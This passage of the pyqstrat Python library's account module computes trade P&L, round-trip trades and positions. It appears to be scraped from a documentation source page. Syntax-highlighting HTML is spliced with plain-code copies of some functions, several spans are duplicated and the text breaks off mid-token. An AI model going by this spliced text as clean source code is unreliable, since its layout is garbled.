class=\"s1\">&#39;price&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;unrealized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;realized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;net_pnl&#39;</span><span class=\"p\">]]</span>\n <span class=\"k\">return</span> <span class=\"n\">df</span></div></div>\n \n\n<span class=\"k\">def</span> <span class=\"nf\">_get_calc_timestamps</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span> <span class=\"n\">pnl_calc_time</span><span class=\"p\">:</span> <span class=\"nb\">int</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">:</span>\n <span class=\"n\">time_delta</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">timedelta64</span><span class=\"p\">(</span><span class=\"n\">pnl_calc_time</span><span class=\"p\">,</span> <span class=\"s1\">&#39;m&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">calc_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"o\">.</span><span class=\"n\">astype</span><span class=\"p\">(</span><span class=\"s1\">&#39;M8[D]&#39;</span><span class=\"p\">))</span> <span class=\"o\">+</span> <span class=\"n\">time_delta</span>\n <span class=\"n\">calc_indices</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">searchsorted</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">calc_timestamps</span><span class=\"p\">,</span> <span class=\"n\">side</span><span class=\"o\">=</span><span class=\"s1\">&#39;left&#39;</span><span class=\"p\">)</span> <span class=\"o\">-</span> <span class=\"mi\">1</span>\n <span class=\"k\">if</span> <span class=\"n\">calc_indices</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span> <span class=\"n\">calc_indices</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"mi\">0</span>\n <span class=\"k\">return</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"n\">calc_indices</span><span class=\"p\">])</span>\n\n\n<span class=\"k\">def</span> <span class=\"nf\">_net_trade</span><span class=\"p\">(</span><span class=\"n\">stack</span><span class=\"p\">:</span> <span class=\"n\">deque</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"p\">:</span> <span class=\"n\">Trade</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">RoundTripTrade</span> <span class=\"o\">|</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span 
class=\"p\">(</span><span class=\"n\">stack</span><span class=\"p\">)</span> <span class=\"ow\">or</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">sign</span><span class=\"p\">(</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">)</span> <span class=\"o\">==</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">sign</span><span class=\"p\">(</span><span class=\"n\">stack</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">):</span>\n <span class=\"n\">stack</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">trade</span><span class=\"p\">)</span>\n <span class=\"k\">return</span> <span class=\"kc\">None</span>\n \n <span class=\"n\">entry</span> <span class=\"o\">=</span> <span class=\"n\">stack</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span>\n <span class=\"n\">qty</span> <span class=\"o\">=</span> <span class=\"nb\">min</span><span class=\"p\">(</span><span class=\"nb\">abs</span><span class=\"p\">(</span><span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">),</span> <span class=\"nb\">abs</span><span class=\"p\">(</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">))</span> <span class=\"o\">*</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">sign</span><span class=\"p\">(</span><span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">qty</span><span class=\"p\">)</span>\n <span class=\"n\">pnl</span> <span class=\"o\">=</span> <span class=\"n\">qty</span> <span class=\"o\">*</span> <span class=\"p\">(</span><span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">price</span> <span class=\"o\">-</span> <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">price</span><span class=\"p\">)</span> <span class=\"o\">*</span> <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">multiplier</span> <span class=\"o\">-</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">commission</span> <span class=\"o\">-</span> <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">commission</span>\n <span class=\"n\">entry_reason_code</span> <span class=\"o\">=</span> <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"o\">.</span><span class=\"n\">reason_code</span> <span class=\"k\">if</span> <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">order</span> <span class=\"k\">else</span> <span class=\"s1\">&#39;&#39;</span>\n <span class=\"n\">exit_reason_code</span> <span class=\"o\">=</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"o\">.</span><span class=\"n\">reason_code</span> <span class=\"k\">if</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">order</span> <span class=\"k\">else</span> <span class=\"s1\">&#39;&#39;</span>\n <span class=\"n\">rt</span> <span class=\"o\">=</span> <span class=\"n\">RoundTripTrade</span><span class=\"p\">(</span><span class=\"n\">entry</span><span class=\"o\">.</span><span 
class=\"n\">contract</span><span class=\"p\">,</span> \n <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">order</span><span class=\"p\">,</span> \n <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"p\">,</span>\n <span class=\"n\">qty</span><span class=\"p\">,</span> \n <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">price</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">price</span><span class=\"p\">,</span> \n <span class=\"n\">entry_reason_code</span><span class=\"p\">,</span> <span class=\"n\">exit_reason_code</span><span class=\"p\">,</span>\n <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">commission</span><span class=\"p\">,</span>\n <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">properties</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">properties</span><span class=\"p\">,</span>\n <span class=\"n\">pnl</span><span class=\"p\">)</span>\n <span class=\"n\">resid</span> <span class=\"o\">=</span> <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">qty</span> <span class=\"o\">-</span> <span class=\"n\">qty</span>\n <span class=\"n\">entry</span><span class=\"o\">.</span><span class=\"n\">qty</span> <span class=\"o\">-=</span> <span class=\"n\">qty</span>\n <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">qty</span> <span class=\"o\">+=</span> <span class=\"n\">qty</span>\n <span class=\"k\">if</span> <span class=\"n\">resid</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span>\n <span class=\"n\">stack</span><span class=\"o\">.</span><span class=\"n\">popleft</span><span class=\"p\">()</span>\n <span class=\"k\">return</span> <span class=\"n\">rt</span>\n\n\n<span class=\"k\">def</span> <span class=\"nf\">_roundtrip_trades</span><span class=\"p\">(</span><span class=\"n\">trades</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">Trade</span><span class=\"p\">],</span>\n <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">RoundTripTrade</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> &gt;&gt;&gt; qtys = [100, -50, 20, -120, 


def _roundtrip_trades(trades: list[Trade],
                      contract_group: ContractGroup | None = None,
                      start_date: np.datetime64 = NAT,
                      end_date: np.datetime64 = NAT) -> list[RoundTripTrade]:
    '''
    >>> qtys = [100, -50, 20, -120, 10]
    >>> prices = [9, 10, 8, 11, 12]
    >>> trades = []
    >>> contract = SimpleNamespace(symbol='AAPL', contract_group='AAPL', multiplier=1)
    >>> order = SimpleNamespace(reason_code='DUMMY')
    >>> for i, qty in enumerate(qtys):
    ...     timestamp = np.datetime64('2022-11-05 08:00') + np.timedelta64(i, 'm')
    ...     trades.append(Trade(contract, order, timestamp, qty, prices[i]))
    >>> rts = _roundtrip_trades(trades, 'AAPL')
    >>> assert [(rt.qty, rt.entry_price, rt.exit_price, rt.net_pnl) for rt in rts] == [
    ...     (50, 9, 10, 50.0), (50, 9, 11, 100.0), (20, 8, 11, 60.0), (-10, 11, 12, -10.0)]
    '''
    rts: list[RoundTripTrade] = []
    stacks: dict[str, deque] = defaultdict(deque)

    for _trade in trades:
        trade = copy.deepcopy(_trade)
        while True:
            rt = _net_trade(stacks[trade.contract.symbol], trade)
            if rt is None: break
            rts.append(rt)
            if trade.qty == 0: break

    return [rt for rt in rts if (np.isnat(start_date) or rt.entry_timestamp >= start_date) and (
        np.isnat(end_date) or rt.exit_timestamp <= end_date) and (
        contract_group is None or rt.contract.contract_group == contract_group)]
class=\"n\">rt</span><span class=\"o\">.</span><span class=\"n\">entry_timestamp</span> <span class=\"o\">&gt;=</span> <span class=\"n\">start_date</span><span class=\"p\">)</span> <span class=\"ow\">and</span> <span class=\"p\">(</span>\n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isnat</span><span class=\"p\">(</span><span class=\"n\">end_date</span><span class=\"p\">)</span> <span class=\"ow\">or</span> <span class=\"n\">rt</span><span class=\"o\">.</span><span class=\"n\">exit_timestamp</span> <span class=\"o\">&lt;=</span> <span class=\"n\">end_date</span><span class=\"p\">)</span> <span class=\"ow\">and</span> <span class=\"p\">(</span>\n <span class=\"n\">contract_group</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span> <span class=\"ow\">or</span> <span class=\"n\">rt</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">contract_group</span> <span class=\"o\">==</span> <span class=\"n\">contract_group</span><span class=\"p\">)]</span>\n\n\n<div class=\"viewcode-block\" id=\"Account\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">Account</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;An Account calculates pnl for a set of contracts&#39;&#39;&#39;</span>\n<div class=\"viewcode-block\" id=\"Account.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">contract_groups</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">ContractGroup</span><span class=\"p\">],</span> \n <span class=\"n\">timestamps</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span>\n <span class=\"n\">price_function</span><span class=\"p\">:</span> <span class=\"n\">Callable</span><span class=\"p\">[[</span><span class=\"n\">Contract</span><span class=\"p\">,</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">ndarray</span><span class=\"p\">,</span> <span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"n\">SimpleNamespace</span><span class=\"p\">],</span> <span class=\"nb\">float</span><span class=\"p\">],</span>\n <span class=\"n\">strategy_context</span><span class=\"p\">:</span> <span class=\"n\">SimpleNamespace</span><span class=\"p\">,</span>\n <span class=\"n\">starting_equity</span><span class=\"p\">:</span> <span class=\"nb\">float</span> <span class=\"o\">=</span> <span class=\"mf\">1.0e6</span><span class=\"p\">,</span> \n <span class=\"n\">pnl_calc_time</span><span class=\"p\">:</span> <span class=\"nb\">int</span> <span class=\"o\">=</span> <span class=\"mi\">15</span> <span class=\"o\">*</span> <span class=\"mi\">60</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> contract_groups: Contract groups that we want to compute PNL for</span>\n<span class=\"sd\"> timestamps: Timestamps that we might compute PNL at</span>\n<span class=\"sd\"> price_function: Function that returns contract prices used to compute 
            strategy_context: This is passed into the price function so we can use the current state of the strategy to compute prices
            starting_equity: Starting equity in account currency. Default 1.e6
            pnl_calc_time: Number of minutes past midnight at which we should calculate PNL. Default 15 * 60, i.e. 3 pm
        '''
        self.starting_equity = starting_equity
        self._price_function = price_function
        self.strategy_context = strategy_context

        self.timestamps = timestamps
        self.calc_timestamps = _get_calc_timestamps(timestamps, pnl_calc_time)

        self.contracts: set[Contract] = set()
        self._trades: list[Trade] = []
        self._pnl = SortedDict()
        self.symbol_pnls_by_contract_group: dict[str, list[ContractPNL]] = defaultdict(list)

        self.symbol_pnls: dict[str, ContractPNL] = {}
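
    # Editor's illustration (not part of the original source): a minimal sketch of constructing an
    # Account, with hypothetical names. The price function must match the Callable annotation above,
    # i.e. (contract, timestamps, index, strategy_context) -> float:
    #     >>> def price_fn(contract, timestamps, i, context):  # hypothetical price source
    #     ...     return context.prices[contract.symbol][i]
    #     >>> context = SimpleNamespace(prices={'AAPL': aapl_prices})  # aapl_prices assumed to exist
    #     >>> account = Account([aapl_group], timestamps, price_fn, context)  # aapl_group assumed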
<span class=\"p\">[</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"k\">for</span> <span class=\"n\">contract</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"p\">]</span></div>\n \n <span class=\"k\">def</span> <span class=\"nf\">_add_contract</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">contract</span><span class=\"p\">:</span> <span class=\"n\">Contract</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">:</span> \n <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;Already have contract with symbol: </span><span class=\"si\">{</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"n\">contract</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">contract_pnl</span> <span class=\"o\">=</span> <span class=\"n\">ContractPNL</span><span class=\"p\">(</span><span class=\"n\">contract</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_price_function</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategy_context</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">[</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">contract_pnl</span>\n <span class=\"c1\"># For fast lookup in position function</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls_by_contract_group</span><span class=\"p\">[</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">contract_group</span><span class=\"o\">.</span><span class=\"n\">name</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">contract_pnl</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"o\">.</span><span class=\"n\">add</span><span class=\"p\">(</span><span class=\"n\">contract</span><span class=\"p\">)</span>\n \n<div class=\"viewcode-block\" id=\"Account.add_trades\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.add_trades\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">add_trades</span><span class=\"p\">(</span><span class=\"bp\">self</span><span 
class=\"p\">,</span> <span class=\"n\">trades</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">Trade</span><span class=\"p\">])</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"n\">trades</span> <span class=\"o\">=</span> <span class=\"nb\">sorted</span><span class=\"p\">(</span><span class=\"n\">trades</span><span class=\"p\">,</span> <span class=\"n\">key</span><span class=\"o\">=</span><span class=\"k\">lambda</span> <span class=\"n\">x</span><span class=\"p\">:</span> <span class=\"nb\">getattr</span><span class=\"p\">(</span><span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">))</span>\n <span class=\"c1\"># Break up trades by contract so we can add them in a batch</span>\n <span class=\"n\">trades_by_contract</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"n\">Contract</span><span class=\"p\">,</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">Trade</span><span class=\"p\">]]</span> <span class=\"o\">=</span> <span class=\"n\">defaultdict</span><span class=\"p\">(</span><span class=\"nb\">list</span><span class=\"p\">)</span>\n <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"n\">trades</span><span class=\"p\">:</span>\n <span class=\"n\">contract</span> <span class=\"o\">=</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">contract</span>\n <span class=\"k\">if</span> <span class=\"n\">contract</span> <span class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"p\">:</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_add_contract</span><span class=\"p\">(</span><span class=\"n\">contract</span><span class=\"p\">,</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"n\">trades_by_contract</span><span class=\"p\">[</span><span class=\"n\">contract</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">trade</span><span class=\"p\">)</span>\n \n <span class=\"k\">for</span> <span class=\"n\">contract</span><span class=\"p\">,</span> <span class=\"n\">contract_trades</span> <span class=\"ow\">in</span> <span class=\"n\">trades_by_contract</span><span class=\"o\">.</span><span class=\"n\">items</span><span class=\"p\">():</span>\n <span class=\"n\">contract_trades</span><span class=\"o\">.</span><span class=\"n\">sort</span><span class=\"p\">(</span><span class=\"n\">key</span><span class=\"o\">=</span><span class=\"k\">lambda</span> <span class=\"n\">x</span><span class=\"p\">:</span> <span class=\"n\">x</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"p\">)</span> <span class=\"c1\"># type: ignore</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">[</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">_add_trades</span><span class=\"p\">(</span><span class=\"n\">contract_trades</span><span class=\"p\">)</span>\n \n <span 
class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trades</span> <span class=\"o\">+=</span> <span class=\"n\">trades</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.calc\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.calc\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">calc</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Computes P&amp;L and stores it internally for all contracts.</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> timestamp: timestamp to compute P&amp;L at. Account remembers the last timestamp it computed P&amp;L up to and will compute P&amp;L</span>\n<span class=\"sd\"> between these and including timestamp. If there is more than one day between the last index and current index, we will </span>\n<span class=\"sd\"> include pnl for at the defined pnl_calc_time for those dates as well.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">timestamp</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_pnl</span><span class=\"p\">:</span> <span class=\"k\">return</span>\n \n <span class=\"n\">prev_idx</span> <span class=\"o\">=</span> <span class=\"n\">find_index_before</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_pnl</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"n\">prev_timestamp</span> <span class=\"o\">=</span> <span class=\"kc\">None</span> <span class=\"k\">if</span> <span class=\"n\">prev_idx</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span> <span class=\"k\">else</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"n\">prev_idx</span><span class=\"p\">]</span>\n \n <span class=\"c1\"># Find the last timestamp per day that is between the previous index we computed and the current index,</span>\n <span class=\"c1\"># so we can compute daily pnl in addition to the current index pnl</span>\n <span class=\"n\">calc_timestamps</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">calc_timestamps</span>\n <span class=\"n\">intermediate_calc_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">calc_timestamps</span><span class=\"p\">[</span><span class=\"n\">calc_timestamps</span> <span class=\"o\">&lt;=</span> <span class=\"n\">timestamp</span><span class=\"p\">]</span>\n <span class=\"k\">if</span> <span class=\"n\">prev_timestamp</span> <span class=\"ow\">is</span> <span class=\"ow\">not</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"n\">intermediate_calc_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">intermediate_calc_timestamps</span><span class=\"p\">[</span><span class=\"n\">intermediate_calc_timestamps</span> <span class=\"o\">&gt;</span> <span class=\"n\">prev_timestamp</span><span class=\"p\">]</span>\n\n <span 
class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">intermediate_calc_timestamps</span><span class=\"p\">)</span> <span class=\"ow\">or</span> <span class=\"n\">intermediate_calc_timestamps</span><span class=\"p\">[</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]</span> <span class=\"o\">!=</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> \n <span class=\"n\">intermediate_calc_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">intermediate_calc_timestamps</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n \n <span class=\"k\">for</span> <span class=\"n\">ts</span> <span class=\"ow\">in</span> <span class=\"n\">intermediate_calc_timestamps</span><span class=\"p\">:</span>\n <span class=\"n\">net_pnl</span> <span class=\"o\">=</span> <span class=\"mf\">0.</span>\n <span class=\"k\">for</span> <span class=\"n\">symbol_pnl</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">():</span>\n <span class=\"n\">symbol_pnl</span><span class=\"o\">.</span><span class=\"n\">calc_net_pnl</span><span class=\"p\">(</span><span class=\"n\">ts</span><span class=\"p\">)</span>\n <span class=\"n\">net_pnl</span> <span class=\"o\">+=</span> <span class=\"n\">symbol_pnl</span><span class=\"o\">.</span><span class=\"n\">net_pnl</span><span class=\"p\">(</span><span class=\"n\">ts</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_pnl</span><span class=\"p\">[</span><span class=\"n\">ts</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">net_pnl</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.position\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.position\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">position</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">float</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Returns netted position for a contract_group at a given date in number of contracts or shares.&#39;&#39;&#39;</span>\n <span class=\"n\">position</span> <span class=\"o\">=</span> <span class=\"mf\">0.</span>\n <span class=\"k\">for</span> <span class=\"n\">symbol_pnl</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls_by_contract_group</span><span class=\"p\">[</span><span class=\"n\">contract_group</span><span class=\"o\">.</span><span class=\"n\">name</span><span class=\"p\">]:</span>\n <span class=\"n\">position</span> <span class=\"o\">+=</span> <span class=\"n\">symbol_pnl</span><span class=\"o\">.</span><span class=\"n\">position</span><span class=\"p\">(</span><span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span 
class=\"k\">return</span> <span class=\"n\">position</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.positions\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.positions\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">positions</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"n\">Contract</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">]]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Returns all non-zero positions in a contract group</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">positions</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"k\">for</span> <span class=\"n\">contract</span> <span class=\"ow\">in</span> <span class=\"n\">contract_group</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"p\">:</span>\n 